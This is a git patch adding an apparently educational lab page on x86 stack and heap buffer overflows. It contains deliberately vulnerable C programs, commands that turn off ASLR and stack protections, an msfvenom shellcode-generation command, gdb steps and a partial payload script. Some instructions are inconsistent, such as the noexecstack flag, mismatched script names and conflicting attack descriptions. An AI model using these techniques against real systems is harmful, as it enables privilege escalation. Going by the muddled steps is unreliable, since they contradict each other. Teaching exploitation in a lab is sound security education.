From 71944c0c05a2ca667297b934e6892992cf517bdd Mon Sep 17 00:00:00 2001 From: Shen Ao <77866826+Neilshen123@users.noreply.github.com> Date: Thu, 6 Apr 2023 20:38:25 -0400 Subject: [PATCH] Add files via upload --- Proj-heapoverflow/06-bufferoverflow.md | 331 +++++++++++++++++++++++++ 1 file changed, 331 insertions(+) create mode 100644 Proj-heapoverflow/06-bufferoverflow.md diff --git a/Proj-heapoverflow/06-bufferoverflow.md b/Proj-heapoverflow/06-bufferoverflow.md new file mode 100644 index 0000000..82d8d68 --- /dev/null +++ b/Proj-heapoverflow/06-bufferoverflow.md @@ -0,0 +1,331 @@ +--- +title: "Introduction to Buffer Overflow Attack IN x86" +teaching: 60 +exercises: 200 +questions: +- "How is memory layout in C program?" +- "Why is it dangerous?" +- "How does bufferoverflow attack happen?" +objectives: +- "Follow instructions to successfully demonstrate the buffer overflow attack." +--- + +# Introduction to Buffer Overflow Attack IN x86 +The learning objective of this lab is for students to gain the first-hand experience on an interesting variant of buffer-overflow attack; this attack can bypass an existing protection scheme currently implemented in major Linux operating systems. A common way to exploit a buffer-overflow vulnerability is to overflow the buffer with a malicious shellcode, and then cause the vulnerable program to jump to the shellcode that is stored in the stack. To prevent these types of attacks, some operating systems allow programs to make their stacks non-executable; therefore, jumping to the shellcode will cause the program to fail. + + + +In this lab, students are given two program with buffer-overflow vulnerability; their task is to develop stack or heap overflow attack to exploit the vulnerability and finally to gain the root privilege. In addition to the attacks, students will be guided to walk through some protection schemes that have been implemented in Ubuntu to counter against the buffer-overflow attacks. This lab covers the following topics: +* Buffer overflow vulnerability and attack +* Stack and heap layout in a c program and the registers related +* Address randomization +* Assembly language +* GDB +* The generation of Shell Code + + +**Readings and related topics.** Detailed coverage of the buffer overflow attack can be found in Chapter 4 of the SEED book, *Computer Security: A Hands-on Approach*, by Wenliang Du. + + + +## Demonstration of Stack Overflow +How it works: The vulnerable point of this Lab is strcpy function which is a C function. We can refer the program.c given The strcpy() function is used to copy a string from one location to another. However, it is considered to be a potentially unsafe function because it does not perform +any bounds checking on the destination buffer, which can lead to buffer overflow vulnerabilities. Other vulnerable functions include strncpy(); memset(); etc. Suppose now the destination buffer is 20 bytes, but we paste 30 bytes in it. As we know from the introduction of stack above. It will overwritten some blocks of stack such as framed pointer or even return address. And in this case, we don’t have the return address anymore. So it will not return to the safe place but execute the attack code(shell code) that we made. Then the attack goes to succeed. So,again. Core goal: change the value of the Return Address. The basic direction of stack overflow vulnerabilities is: the parent function (caller) takes the return address of the sub-function (callee) when calling the sub-function. This address +contains the base address of the parent function. That is, after a function call is completed, the +stack frame at that time must be deleted and the value of the Return Address is returned to rip/eip +to achieve the operation of returning to the parent function. Therefore, we only need to find a way to change the value of the Return Address to the address of the vulnerable function, and we can gain control of the system through this vulnerable function. + +### The Vulnerable Program +```C +/* program.c */ + +/* This program has a stack overflow vulnerability. */ +/* Our task is to exploit this vulnerability */ +#include +#include + +void vulnerable(char *arg) +{ + char buf[512]; + strcpy(buf, arg); + +} + +void call_vul(char *arg) +{ + char temp[72]; + vulnerable(arg); +} + +int main(int argc, char **argv) +{ + if (argc != 2) { + fprintf(stderr, "Error: need a command-line argument\n"); + return 1; + } + call_vul(argv[1]); + return 0; +} + +``` +### Turning off Countermeasures (which has been done when we create the containers) +Ubuntu and other Linux distributions have implemented several security mechanisms to make the buffer-overflow attack difficult. To simplify our attacks, we need to disable them first. + +**Address Space Randomization.** Ubuntu and several other Linux-based systems uses address space randomization [?] to randomize the starting address of heap and stack. It's a type of linux kernel protection mechenism which includes ASLR & PIE. In this lab, we will disable ASLR. This makes guessing the exact addresses difficult; guessing addresses is one of the critical steps of buffer-overflow attacks. In this lab, we disable this feature using the following command: + +> ## Using setarch +> +> Because we are using containers, you will not be able to change kernel settings. This command will run in the host machine rather than container level. +{: .callout} + +```bash +sudo echo 0 | sudo tee /proc/sys/kernel/randomize_va_space +``` + +**The StackGuard Protection Scheme.** The GCC compiler implements a security mechanism called StackGuard to prevent buffer overflows. In the presence of this protection, buffer overflow attacks will not work. We can disable this protection during the compilation using the -fno-stack-protector option. For example, to compile a program example.c with StackGuard disabled, we can do the following: + +```bash +$ gcc -fno-stack-protector example.c +``` + +Non-Executable Stack. Ubuntu used to allow executable stacks, but this has now changed: the binary images of programs (and shared libraries) must declare whether they require executable stacks or not, i.e., they need to mark a field in the program header. Kernel or dynamic linker uses this marking to decide whether to make the stack of this running program executable or non-executable. This marking is done automatically by the recent versions of gcc, and by default, stacks are set to be non-executable. To change that, use the following option when compiling programs: + +```bash +For executable stack: +$ gcc -z execstack -o test test.c + +For non-executable stack: +$ gcc -z noexecstack -o test test.c +``` + +Because the objective of this lab is to show that the non-executable stack protection does not work, you should always compile your program using the "-z noexecstack" option in this lab. +### Generation of Shell Code (which has been done when we create the containers) +```bash +RUN msfvenom -p linux/x86/exec CMD=/bin/sh AppendExit=true -e x86/alpha_mixed -f python >shell.txt +``` + + + + +### Task 1: Finding out the addresses of initial position of Shell code and return address +In Stack Overflow attacks, we need to jump to some existing code that has already been loaded into the memory. We need to know what is the return address as well as the initial position of Shell Code so that we can make the function return to the position of Shell Code. \There are many ways to do that, but using the GNU gdb debugger is probably the easiest method. Let us pick an arbitrary program "program" to debug: + +```bash +$ gdb program + (gdb) b 8 (1) + (gdb) run AAAAAAAA (2) + (gdb) info register (3) + (gdb) x/200x $esp (4) +``` +We can see the initial position of the buffer. We get the return address stored right after the value of register ebp which should be ebp + 4 + +```bash + (gdb) q (1) + (gdb) y (2) +``` + +In the above gdb commands, we first set a break point at the 8th row of the program (Line 1); we then run the debugged program using command run AAAAAAAA (Line 2). +And we need to replace the value in the return address as the initial position of shell code and in order to do that. We need to fill the space from ebp to esp before the return address. If you want to know more about register. You can refer to the resources above. + +### Task 2: Putting the shell string in the memory +Our attack strategy is to jump to the system() function and get it to execute an arbitrary command. Since we would like to get a shell prompt, we want the system() function to execute the "/bin/sh" program. Therefore, the command string "/bin/sh" must be put in the memory first and we have to know its address (this address needs to be passed to the system() function). There are many ways to achieve these goals; we choose a method that use environment variables. Students are encouraged to use other approaches. + +When we execute a program from a shell prompt, the shell actually spawns a child process to execute the program. All the exported shell variables will become the environment variable of the child process. This creates an easy way for us to put some arbitrary string in the child process’s memory. Let us define a new shell variable MYSHELL, and let it contain the string "/bin/sh". From the following commands, we can verify that the string gets into the child process, and it is printed out by the env command running inside the child process. + +```bash +$ $vim shel1.py +``` +For buf, just copy from shell.txt. For initoffset, just calculate the number of ‘A’ that +should be filled in which equals to 512 + 4(size of ebp) - size of shellcode(should be 162 or 161). And replace the rerturn address that should be reversly return and written in hex format. For +example, if the return address is 0xff91dd83, then ret = ‘\x83\xdd\x91\xff + +```Python +initoffset='\x90'*1 +buf='' +ret='\x80\x8f\xff\xbf' +shell=initoffset+buf+ret + +``` + + + +### Task 3: Exploiting the Stack-Overflow Vulnerability +We are ready to create the content of badfile. Since the content involves some binary data (e.g., the address of the libc functions), we wrote a C program to do the construction. We provide you with as keleton of the code, with the essential parts left for you to fill out. + +```bash +$python shel1.py +$./program $(python sol1.py) +you will have the shell! +# <---- You’ve got a root shell! +``` + + +--- +title: "Introduction to Heap Overflow Attack IN x86" +teaching: 60 +exercises: 200 +questions: +- "How is memory layout in C program?" +- "Why is it dangerous?" +- "How does bufferoverflow attack happen?" +objectives: +- "Follow instructions to successfully demonstrate the buffer overflow attack." +--- + +# Introduction to Heap Overflow Attack IN x86 +The learning objective of this lab is for students to gain the first-hand experience on an interesting variant of buffer-overflow attack; this attack can bypass an existing protection scheme currently implemented in major Linux operating systems. A common way to exploit a heap-overflow vulnerability is to overflow the heap with garbage values, and then overwrite the return address to jump to the target function that is not called in the program. To prevent these types of attacks, some operating systems have protection in heaps and stacks and ; therefore, jumping to the function will cause the program to fail. + + + +In this lab, students are given three programs. understand_heap.c to understand the memory layout, heapoverflow_vulnerability.c for understanding the vulnerability and attack.c for attacking the vulnerablity. In addition to the attacks, students will be guided to walk through some protection schemes that have been implemented in Ubuntu to counter against the buffer-overflow attacks. This lab covers the following topics: +* Heap overflow vulnerability and attack +* Stack and heap layout in a c program and the registers related +* Address randomization +* Assembly language +* GDB +* The generation of Shell Code + + +**Readings and related topics.** Detailed coverage of the buffer overflow attack can be found in Chapter 4 of the SEED book, *Computer Security: A Hands-on Approach*, by Wenliang Du. + + +## Understanding Memory Layout +Each running program has its own memory layout, separated from other programs. To understand it more better let us take the example of our understanding_heap.c example. The layout consists of a lot of segments, including: +```C +/* understanding_heap.c */ + +/* This program is to understand memory layout. */ +#include + +void dummy_func() +{ + printf("This is a dummy function."); +} + +void memory_check() +{ + printf("This is a sample memory check"); +} + + +int main(void) +{ + char *address; + int main_add=memory_check; + printf("Enter the address of function memory_check in hex :"); + scanf("%s", address); + char *b = address + 2; + int num = (int)strtol(b, NULL, 16); + if(main_add==num){ + printf("\n You have found the address successfully!!!\n\n"); + } + printf("Next Step is to attack the heapoverflow_vulnerability"); + return 0; +} +``` +In this example let us consider the memory layout for function default_fc(argv*) +* Stack: Stores local variables of a function. + + Stores the variable ``` temp[72] ``` + ebp[Base pointer address] + Return address + arguments[char *arg] +* Heap: Stores dynamically allocated variables. (Variables stored using malloc() or calloc() are stored in heap) + + Stores the variable ```ptr``` + ebp[Base pointer address] + Return address. +* Data: Stores global variables of the function. (Consist of both unitialized data + initialized data) + + + Stores the variable ``` data ``` : 10 Bytes. + +![memory_layout.png]() + +## Demonstration of Heap Overflow +How it works: The vulnerable point of this Lab is strcpy function which is a C function. We can refer the program.c given The strcpy() function is used to copy a string from one location to another. However, it is considered to be a potentially unsafe function because it does not perform +any bounds checking on the length to be copied on destination buffer, which can lead to buffer overflow vulnerabilities, as we can overflow the destination buffer to our required length to overwritte specific parts of stack. Other vulnerable functions include strncpy(); memset(); etc. Suppose now the destination buffer is 20 bytes, but we paste 30 bytes in it. As we know from the introduction of heap above, it will overwrite some blocks of heap such as framed pointer or even return address. So it will not return to the default place but rather return to the address we overwrite to. + +From the above example, the **Core goal** is to call the function ```success()```, but in the example there is no where that the function is called. To achieve this we can use the existing vulnearbilty and overwrite the buffer and return address with the address of function success such that the function doesn't exit to ```main()```, rather it will call the function ``` success()```. + +In real life application this attack can be used to return the program to system function [ to spawn a shell] and gain root access. + +### GDB Tutorial +GDB is a debugger to analyse the memory and perform code analysis of C programs. To understand more about GDB follow the link- https://www.sourceware.org/gdb/ + +```assembly +$ gdb +$ gdb understand_heap + +info procmap # To get the address of stacks and heap. +disassemble #To get the address the functions. +``` +Run the executable understand_heap to understand the memory layout and find the address of function in the code. + +### The Vulnerable Program +```C +/* program.c */ + +/* This program has a stack overflow vulnerability. */ +/* Our task is to exploit this vulnerability */ +#include +#include +#include +#include +#include + +struct data { + char name[64]; +}; + +struct fp { + int (*fp)(); +}; + +void success() +{ + printf("Congratulations to attack the lab\n"); +} + +void fail() +{ + printf("Goal Failed\n"); +} + +int main(int argc, char **argv) +{ + struct data *d; + struct fp *f; + + d = malloc(sizeof(struct data)); + f = malloc(sizeof(struct fp)); + f->fp = fail; + + printf("data is at %p, fp is at %p\n", d, f); + + strcpy(d->name, argv[1]); + + f->fp(); + +} + + +``` + +```bash +$gdb heapoverflow +(gdb) b 38 +(gdb) run AAAAAAAA +``` + +```bash +(gdb) info proc map +(gdb) x/2200x $(the address of heap()) +(gdb) info address success +``` + + +```bash +(gdb) q +(gdb) y +$vim sol1.py +$ ./heapoverflow $(python sol1.py) +``` +You make it! + +figure of the sign showing success. \ No newline at end of file